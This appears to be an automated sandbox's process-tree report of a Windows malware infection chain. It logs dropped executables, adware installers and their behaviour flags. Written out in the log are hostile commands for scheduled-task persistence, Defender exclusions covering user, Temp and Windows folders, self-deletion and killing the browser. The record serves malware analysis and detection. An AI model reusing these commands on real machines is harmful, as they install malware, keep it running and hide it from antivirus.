                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                          12⤵
                                                                                                                                                                                            PID:10188
                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                              13⤵
                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                              PID:3880
                                                                                                                                                                                          • C:\Windows\system32\services32.exe
                                                                                                                                                                                            "C:\Windows\system32\services32.exe"
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:10204
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:9896
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                      PID:7236
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                        PID:4052
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                        PID:3016
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:9348
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:9972
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                            PID:10052
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:8720
                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:10156
                                                                                                                                                                                                              • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                  PID:1032
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:9116
                                                                                                                                                                                                                  • C:\Windows\system32\choice.exe
                                                                                                                                                                                                                    choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                      PID:9852
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                PID:4500
                                                                                                                                                                                                                • C:\Windows\system32\choice.exe
                                                                                                                                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                    PID:9928
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:9956
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                              PID:7528
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:10184
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                PID:8228
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                  "{path}"
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:9672
                                                                                                                                                                                                          • C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:6500
                                                                                                                                                                                                          • C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:6436
                                                                                                                                                                                                            • C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              PID:6868
                                                                                                                                                                                                            • C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:6700
                                                                                                                                                                                                              • C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
                                                                                                                                                                                                                C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:7956
                                                                                                                                                                                                              • C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:6240
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-CT141.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-CT141.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp" /SL5="$2051E,138429,56832,C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:5664
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-129HT.tmp\Setup.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-129HT.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:7276
                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                            PID:6904
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289476 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:5588
                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpBC09_tmp.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\tmpBC09_tmp.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:6308
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                          "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:7544
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:7332
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:7224
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:7456
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                      Esplorarne.exe.com i
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                      PID:5296
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                        PID:5708
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                          PID:4612
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                            PID:5364
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                              PID:7708
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:8304
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                      PID:8736
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                        PID:9172
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                          PID:8696
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            18⤵
                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                            PID:8860
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                                PID:8736
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                  20⤵
                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                  PID:8484
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                      PID:9120
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                          PID:8876
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                            23⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                            PID:8736
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                              24⤵
                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                              PID:8824
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                25⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                PID:6280
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                  PID:9168
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                    PID:7688
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                      PID:6848
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                PID:7964
                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5668
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4171906.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4171906.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:2444
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3421432.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3421432.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                          PID:5524
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7129293.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7129293.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:580
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3282280.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3282280.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5928
                                                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:5476
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:6756
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:6884
                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                  PID:5756
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5768
                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    PID:4912
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 0B6CD2DDFDCC7409E05B767FECAAFEFC C
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:6164
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding B1B3D9F27A23D69159E6B8E699C28871 C
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding B4ED8CC028341882E9F250C9B6F0493D C
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:8380
                                                                                                                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding A29DE90E816E37509BE2CF781B2F925D
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      PID:8956
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                      PID:2268
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                        PID:5500
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                                          PID:4540
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1f0,0x1f4,0x1f8,0x1ec,0x1fc,0x7ff9e62b9ec0,0x7ff9e62b9ed0,0x7ff9e62b9ee0
                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                              PID:5344
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=2092 /prefetch:8
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:9012
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --mojo-platform-channel-handle=2016 /prefetch:8
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                  PID:2036
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1544,11000603426249382350,8828443669998397139,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4540_739315349" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                  PID:4300
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
